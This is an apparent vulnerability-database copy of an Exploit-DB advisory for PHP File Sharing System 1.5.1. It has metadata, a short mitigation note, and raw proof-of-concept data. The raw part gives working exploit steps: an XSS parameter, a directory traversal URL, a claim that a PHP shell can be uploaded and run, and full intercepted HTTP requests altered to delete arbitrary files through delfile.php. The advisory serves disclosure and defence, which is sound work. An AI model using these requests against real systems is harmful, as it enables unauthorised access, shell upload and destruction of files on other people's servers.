PHP File Sharing System 1.5.1 Multiple Vulnerabilities

vendor:

PHP File Sharing System

by:

blake

8,8

CVSS

HIGH

XSS, Directory transversal, Shell through file upload, Intercept requests

79, 22, 264, 693

CWE

Product Name: PHP File Sharing System

Affected Version From: 1.5.1

Affected Version To: 1.5.1

Patch Exists: YES

Related CWE: N/A

CPE: a:php_file_sharing_system:php_file_sharing_system:1.5.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 with xampplite

2020

PHP File Sharing System 1.5.1 Multiple Vulnerabilities

The PHP File Sharing System 1.5.1 is vulnerable to XSS, Directory transversal, Shell through file upload and Intercept requests. An attacker can exploit these vulnerabilities by sending a malicious request to the server. The malicious request can be used to upload a PHP shell, traverse the directory structure, and intercept requests to delete system files.

Mitigation:

The application should be updated to the latest version and all the security patches should be applied. The application should be tested for any vulnerabilities and the security measures should be implemented to prevent any malicious requests.

Source

Exploit-DB raw data:

Title: PHP File Sharing System 1.5.1 Multiple Vulnerabilities
Author: blake
Tested on: Windows XP SP3 with xampplite


1) XSS
http://192.168.1.149/fss/index.php?cam=

2) Directory transversal
http://192.168.1.149/fss/index.php?cam=/../../../../../../../..

3) Shell through file upload
can upload php shell, click on file, and get shell

4) can intercept requests using proxy and delete system files

intercept request in webscarab

GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=./uploads/reverse_shell_windows.php HTTP/1.1
Host: 192.168.1.149
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.149/fss/index.php?cam=

and modify

GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=log.txt HTTP/1.1
Host: 192.168.1.149
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.149/fss/index.php?cam=